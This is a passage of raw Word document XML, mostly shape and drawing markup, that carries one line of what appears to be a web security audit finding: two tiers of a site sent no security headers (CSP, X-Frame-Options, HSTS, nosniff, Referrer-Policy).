AYHhZ+bz60zBfDYFc2OhOR6m5benYJony/EIAfeHqZ8kUWzq&#10;eXpbAHzorvFqo5As+eYotI2JMvTaKCR1F0YhFb8t9xHjqdkBAMRFT9dKzxvjiHdal1YCSjq+2kpj&#10;iOyVVroi0tVWOrXMti1siTSXiYGe4/4GPYXGFZHpadmibLBg1NiI45KfcTo4M29p1v/zljaN41Tl&#10;75ZmvpRcS3rFlobXfPi2wdY8fIeZj6fxO6zHX4t3/wMAAP//AwBQSwMEFAAGAAgAAAAhAATXOH7h&#10;AAAACgEAAA8AAABkcnMvZG93bnJldi54bWxMj8FqwkAQhu+FvsMyhd50N1WLptmISNuTFKqF0tuY&#10;HZNgdjZk1yS+fddTe5thPv75/mw92kb01PnasYZkqkAQF87UXGr4OrxNliB8QDbYOCYNV/Kwzu/v&#10;MkyNG/iT+n0oRQxhn6KGKoQ2ldIXFVn0U9cSx9vJdRZDXLtSmg6HGG4b+aTUs7RYc/xQYUvbiorz&#10;/mI1vA84bGbJa787n7bXn8Pi43uXkNaPD+PmBUSgMfzBcNOP6pBHp6O7sPGi0bBUi3lENUxmCYgb&#10;oFSyAnGM02oOMs/k/wr5LwAAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQB&#10;AAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQChR1JRCAQAAHUO&#10;AAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAE1zh+4QAA&#10;AAoBAAAPAAAAAAAAAAAAAAAAAGIGAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAcAcA&#10;AAAA&#10;">
                <v:shape id="Shape 2026" o:spid="_x0000_s1027" style="position:absolute;width:4572;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="457201,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UyqxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvC36H8ARv29QiRapR/MOC7s3uCh4fzbMtNi+1yWr99mZB8DjMzG+Y+bI3jbhR52rLCsZRDIK4&#10;sLrmUsHvz9fnFITzyBoby6TgQQ6Wi8HHHDNt73ygW+5LESDsMlRQed9mUrqiIoMusi1x8M62M+iD&#10;7EqpO7wHuGlkEsepNFhzWKiwpU1FxSX/MwpM8y33u3Str8nKbh/5cXKa7K1So2G/moHw1Pt3+NXe&#10;aQVJnKTw/yY8Abl4AgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAI31TKrEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m9526,l447676,v2630,,4875,930,6735,2791c456271,4651,457201,6896,457201,9525r,123825c457201,135992,456271,138224,454411,140084v-1860,1861,-4105,2791,-6735,2791l9526,142875v-2631,,-4876,-930,-6736,-2791c930,138224,,135992,1,133350l1,9525c,6896,930,4651,2790,2791,4650,930,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,457201,142875"/>
                </v:shape>
                <v:shape id="Shape 2029" o:spid="_x0000_s1028" style="position:absolute;left:6953;width:5524;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="552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qIexgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gRvdWMQtamrSCXQXBRtFY+v2WcSmn0bsqum/94VhB6HmfmGmS87U4srta6yrGA0jEAQ&#10;51ZXXCj4/kpfZyCcR9ZYWyYFf+Rguei9zDHR9sY7uu59IQKEXYIKSu+bREqXl2TQDW1DHLyzbQ36&#10;INtC6hZvAW5qGUfRRBqsOCyU2NBHSfnv/mIUbDezLHXjdTZZHX4O64zHx3R6UmrQ71bvIDx1/j/8&#10;bH9qBXEUv8HjTXgCcnEHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAnvKiHsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m9525,l552450,r,142875l9525,142875v-2631,,-4876,-930,-6736,-2791l,133351,,9524,2789,2791c4649,930,6894,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,55245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7856" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="14275500" wp14:editId="43F49959">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>151543</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="381000" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26995" name="Group 26995"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="381000" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="381000" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2031" name="Shape 2031"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="381000" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="381000" h="142875">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="371475" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="374105" y="0"/>
                                  <a:pt x="376350" y="930"/>
                                  <a:pt x="378210" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="380070" y="4651"/>
                                  <a:pt x="381000" y="6896"/>
                                  <a:pt x="381000" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="381000" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="381000" y="135979"/>
                                  <a:pt x="380070" y="138224"/>
                                  <a:pt x="378210" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="376350" y="141945"/>
                                  <a:pt x="374105" y="142875"/>
                                  <a:pt x="371475" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="142875"/>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4348B1D" id="Group 26995" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:11.95pt;width:30pt;height:11.25pt;z-index:-251418624" coordsize="38100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CgGBAMAAP0HAAAOAAAAZHJzL2Uyb0RvYy54bWykVclu2zAQvRfoPwi6N1ptyULsAG2WS9EG&#10;TfoBNEVZAihRIGnL6dd3OBJpKw5ySHyQSc7++DhzfXNsuXdgUjWiW/vRVeh7rKOibLrd2v/7fP8t&#10;9z2lSVcSLjq29l+Y8m82X79cD33BYlELXjLpgZNOFUO/9mut+yIIFK1ZS9SV6FkHwkrIlmjYyl1Q&#10;SjKA95YHcRgug0HIspeCMqXg9HYU+hv0X1WM6t9VpZj2+NqH3DR+JX635htsrkmxk6SvGzqlQT6Q&#10;RUuaDoI6V7dEE28vmwtXbUOlUKLSV1S0gaiqhjKsAaqJwlfVPEix77GWXTHsegcTQPsKpw+7pb8O&#10;D7J/6h8lIDH0O8ACd6aWYyVb8w9ZekeE7MVBxo7ao3CY5FEYArAURFEa59lihJTWgPuFFa3v3rUL&#10;bNBglsrQAznUqX71ufqfatIzhFUVUP+j9Jpy7cdhEvleR1pgKWp4eIKwoJ4DSRUK8PocQq5SUtC9&#10;0g9MINTk8FPpkZOlXZHaruixs0sJzH6X0z3Rxs5kaZbecLqr2l2VkbbiwJ4F6ulXFwZJnqS8O9dK&#10;siiFu/YsI0DVKtD9tqHf2b+5ehqFZ+qQFAZLsmWyAPqAm1UyvUYryeNolMTZKjKsghhz3/PdZJeH&#10;YTbapcsF2rlgE1ch2DJfLUeiWquRxiaPRYwcvohm67uwiJLEFDFmaLXezs1FiZLFKlvNU3CJR0ke&#10;x+lMmDk0ojQMcxReZPhmzBPCURqt0ul9WpDdtZw/Xit0V3wSXsS09Y42I/Azdatg/88VL0DjQrER&#10;R0NavHJHZAx9eiq8M5yGgJTA3Kg40diA20bDQOFNCySPM9Ob7L2AN9NIxreLK/3CmSE+7/6wCpoA&#10;NjlzoORu+4NL70DM2MAfOie8r8l0OvmdVDFV9GPsq4Zz5zJC05nLu9v7+B4JCEVNysaO4cRyluFo&#10;SadsxrEFzR+KtsML7J0RRhaddvYdjFxM86xas9yK8gUbPgICnRWhwRmDdUzz0Ayx8z1qnab25j8A&#10;AAD//wMAUEsDBBQABgAIAAAAIQBqRWuJ2wAAAAYBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI5BS8NA&#10;FITvgv9heYI3u0lbg8ZsSinqqQi2gnh7TV6T0OzbkN0m6b/39aSnYZhh5stWk23VQL1vHBuIZxEo&#10;4sKVDVcGvvZvD0+gfEAusXVMBi7kYZXf3mSYlm7kTxp2oVIywj5FA3UIXaq1L2qy6GeuI5bs6HqL&#10;QWxf6bLHUcZtq+dRlGiLDctDjR1taipOu7M18D7iuF7Er8P2dNxcfvaPH9/bmIy5v5vWL6ACTeGv&#10;DFd8QYdcmA7uzKVXrYH5sxRFFqISJ1d/MLBMlqDzTP/Hz38BAAD//wMAUEsBAi0AFAAGAAgAAAAh&#10;ALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAU&#10;AAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAU&#10;AAYACAAAACEA+RAoBgQDAAD9BwAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwEC&#10;LQAUAAYACAAAACEAakVridsAAAAGAQAADwAAAAAAAAAAAAAAAABeBQAAZHJzL2Rvd25yZXYueG1s&#10;UEsFBgAAAAAEAAQA8wAAAGYGAAAAAA==&#10;">
                <v:shape id="Shape 2031" o:spid="_x0000_s1027" style="position:absolute;width:381000;height:142875;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="3810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7IqxgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvuolSK9E1SNHWYzVB8PbIPpNg9m2aXTX9912h0OMwM98wq7Q3jbhT52rLCuJJBIK4&#10;sLrmUkGe7cYLEM4ja2wsk4IfcpCuh4MVJto++ED3oy9FgLBLUEHlfZtI6YqKDLqJbYmDd7GdQR9k&#10;V0rd4SPATSOnUTSXBmsOCxW29F5RcT3ejAJ6vZ228/PH4TP73sqv2aV5y+VOqZdRv1mC8NT7//Bf&#10;e68VTKNZDM834QnI9S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdceyKsYAAADdAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" path="m,l371475,v2630,,4875,930,6735,2791c380070,4651,381000,6896,381000,9525r,123825c381000,135979,380070,138224,378210,140084v-1860,1861,-4105,2791,-6735,2791l,142875,,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,381000,142875"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Neither tier sent </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> security header: no CSP, no </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>X-Frame-Options</w:t>
      </w:r>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clickjackable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">), no HSTS, no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nosniff</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no </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ReferrerPolicy</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p>
    <w:p w14:paraId="376E1533" w14:textId="72013179" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="0"/>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8880" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19ABB597" wp14:editId="6B62158E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3228081</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>152447</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="933450" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26997" name="Group 26997"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="933450" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="933450" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2042" name="Shape 2042"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="933450" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="933450" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="926555" y="0"/>
                                  <a:pt x="928800" y="930"/>
                                  <a:pt x="930660" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="932520" y="4651"/>
                                  <a:pt x="933450" y="6896"/>
                                  <a:pt x="933450" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="933450" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="933450" y="135979"/>
                                  <a:pt x="932520" y="138224"/>
                                  <a:pt x="930660" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="928800" y="141945"/>
                                  <a:pt x="926555" y="142875"/>
                                  <a:pt x="92392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0F1A42D" id="Group 26997" o:spid="_x0000_s1026" style="position:absolute;margin-left:254.2pt;margin-top:12pt;width:73.5pt;height:11.25pt;z-index:-251417600" coordsize="9334,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P9VAMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N9osxxJiB2izXIo2&#10;aNIPoCnKEiCJAklv/foOhyJl2UHQJjk4FGfecObN43Jze2gbb8eErHm39KOr0PdYR3lRd5ul//vl&#10;4cvC96QiXUEa3rGlf2TSv119/nSz73MW84o3BRMeBOlkvu+XfqVUnweBpBVribziPevAWHLREgWf&#10;YhMUguwhetsEcRjOgz0XRS84ZVLC7J0x+iuMX5aMqp9lKZnymqUPuSn8Ffi71r/B6obkG0H6qqZD&#10;GuQdWbSk7mBRF+qOKOJtRX0Rqq2p4JKX6oryNuBlWVOGNUA1UXhWzaPg2x5r2eT7Te9oAmrPeHp3&#10;WPpj9yj65/5JABP7fgNc4Jeu5VCKVv+HLL0DUnZ0lLGD8ihMZkkyS4FYCqZoFi+uU0MprYD3CxSt&#10;7t/EBXbRYJLKvgdxyLF++bH6nyvSM6RV5lD/k/DqYunH4Sz2vY60oFL08HAGaUE/R5LMJfD1MYZc&#10;pSSnW6keGUeqye67VEaThR2Ryo7oobNDAcp+U9M9URqns9RDbz/2qnKt0taW79gLRz+lG5alcep7&#10;ttOQ5+jQdBPHOMnOXK0D3a5r+pX9mbrP0/QkMuRl1osXixAUBCtmybAhB0sSzufGEl9nkRYWpDON&#10;Pf2yuDiNDW42TxHnFhvkCovNF9ncaNWijJJ1HpqC11az9V0goiRJYBsYjPV6PTe3SpSk2XU2TcEl&#10;HiWLOJ5NjY6NaBaGCzT+Gx8jw9EsymbDFh2KiF1bTvevNboWj8aLNW29A8bqZ4KwPq9xAp0wuhgR&#10;tl/QP9PIy8RBEtb0f2yAyLTYLhm28+dtsfMnLZ6WYYszBBj3Ew1Z8xR06nypRRPkXL6u5v/aD47E&#10;s/3leJ/uOts/K+dp2rThkhmd63MFt6Q7a1Aa42nWdPrYgVIogau9bIjCO7KtFdz5Td1CE+LrEDa/&#10;3TcQTZ/15njFkTo2TJ9NTfeLlXBO4z2kJ6TYrL81wtsRfbPjHwYnTV+RYXaIO7hiqhhH48u6aVzI&#10;CKGTkPd3D/EDHhBQ1OCscQwfFQ4ZGiQdsjEvC7ifoWj7vgC8A+HKvFMO38GrCNM8qVYP17w44p2M&#10;hMDlh9TgMwDrGJ4s+p1x+o1e48Nq9RcAAP//AwBQSwMEFAAGAAgAAAAhABMgyjngAAAACQEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj8FKw0AQhu+C77CM4M1uUpNQYialFPVUBFtBvG2z0yQ0uxuy2yR9&#10;e8eTPc7Mxz/fX6xn04mRBt86ixAvIhBkK6dbWyN8Hd6eViB8UFarzllCuJKHdXl/V6hcu8l+0rgP&#10;teAQ63OF0ITQ51L6qiGj/ML1ZPl2coNRgcehlnpQE4ebTi6jKJNGtZY/NKqnbUPVeX8xCO+TmjbP&#10;8eu4O5+2159D+vG9iwnx8WHevIAINId/GP70WR1Kdjq6i9VedAhptEoYRVgm3ImBLE15cURIshRk&#10;WcjbBuUvAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAA&#10;AAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAIWDM/1UAwAAoAkAAA4AAAAAAAAA&#10;AAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhABMgyjngAAAACQEAAA8AAAAA&#10;AAAAAAAAAAAArgUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAC7BgAAAAA=&#10;">
                <v:shape id="Shape 2042" o:spid="_x0000_s1027" style="position:absolute;width:9334;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="933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NyAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BS8NA&#10;FITvBf/D8gQvxW4MpdjYbSkFtaBQbUvB2yP7zAazb5PsmsR/7xYKPQ4z8w2zWA22Eh21vnSs4GGS&#10;gCDOnS65UHA8PN8/gvABWWPlmBT8kYfV8ma0wEy7nj+p24dCRAj7DBWYEOpMSp8bsugnriaO3rdr&#10;LYYo20LqFvsIt5VMk2QmLZYcFwzWtDGU/+x/rYKX9cecT2+mH+9eu/fDvGk2X9wodXc7rJ9ABBrC&#10;NXxpb7WCNJmmcH4Tn4Bc/gMAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCg/JkNyAAAAN0A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" path="m9525,l923925,v2630,,4875,930,6735,2791c932520,4651,933450,6896,933450,9525r,123825c933450,135979,932520,138224,930660,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135979,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,93345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99904" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CE1CF2A" wp14:editId="6DD54B5B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5228332</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>323897</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="466725" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="26999" name="Group 26999"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="466725" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="466725" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2048" name="Shape 2048"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="466725" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="466725" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="459830" y="0"/>
                                  <a:pt x="462075" y="930"/>
                                  <a:pt x="463935" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="465795" y="4651"/>
                                  <a:pt x="466725" y="6896"/>
                                  <a:pt x="466725" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="466725" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="466725" y="135979"/>
                                  <a:pt x="465795" y="138224"/>
                                  <a:pt x="463935" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="462075" y="141945"/>
                                  <a:pt x="459830" y="142875"/>
                                  <a:pt x="457200" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="142875"/>
                                  <a:pt x="4649" y="141945"/>
                                  <a:pt x="2789" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="929" y="138224"/>
                                  <a:pt x="0" y="135979"/>
                                  <a:pt x="0" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="0" y="6896"/>
                                  <a:pt x="929" y="4651"/>
                                  <a:pt x="2789" y="2791"/>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C18D38D" id="Group 26999" o:spid="_x0000_s1026" style="position:absolute;margin-left:411.7pt;margin-top:25.5pt;width:36.75pt;height:11.25pt;z-index:-251416576" coordsize="466725,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OeVAMAAKAJAAAOAAAAZHJzL2Uyb0RvYy54bWykVslu2zAQvRfoPwi6N1os2ZYQO0Cb5VK0&#10;QZN+AENTlgBKFEh669d3OBIpyQ6CNsnBoTjzZnkzHPL65lhzb8+kqkSz8qOr0PdYQ8WmarYr//fz&#10;/Zel7ylNmg3homEr/8SUf7P+/On60OYsFqXgGyY9MNKo/NCu/FLrNg8CRUtWE3UlWtaAsBCyJho+&#10;5TbYSHIA6zUP4jCcBwchN60UlCkFu7ed0F+j/aJgVP8sCsW0x1c+xKbxV+Lvi/kN1tck30rSlhXt&#10;wyDviKImVQNOnalboom3k9WFqbqiUihR6Csq6kAURUUZ5gDZROFZNg9S7FrMZZsftq2jCag94+nd&#10;ZumP/YNsn9pHCUwc2i1wgV8ml2Mha/MfovSOSNnJUcaO2qOwmcznizj1PQqiKImXi7SjlJbA+wWK&#10;lndv4gLrNJiEcmihOdSQv/pY/k8laRnSqnLI/1F61Wblx2ECvdqQGroUNTzcQVpQz5GkcgV8fYwh&#10;lynJ6U7pByaQarL/rnTXkxu7IqVd0WNjlxI6+82ebok2OBOlWXqHoValK5WR1mLPngXqaVOwLDX1&#10;tJWGOAcF3owVk3QBJ3CiahXo7qWiX9mfqXq2nI3UIS70l8zjELrGeMxAjslbySybdZJ4kUVGBOFM&#10;bU+/LC5dZB0umaeIG5x17QrO5stsPvXmREjBa95sftaPQ0Sz2SzF4CFCq/V6bCNMmi2yaQgu8Gi2&#10;jONkKnRsREkYLlH4j3w4hqMkypL+iPZJpK4s4/Nrha7Eg/DCp823w7j+mSCszmucQCUSrP+AGOqV&#10;ZL3oPPB4sbSi/2Iji3vYBcNdc0az87LY/VGJp2nY5DoCOvVRD1nxFDRWPu9FG+N5+7qc//M89CSe&#10;nS/H++TUufrZdp6GTblQrDsbZq7gkXSzBltjmGa8MWMH+KAErvaCE413ZF1puPN5VcMc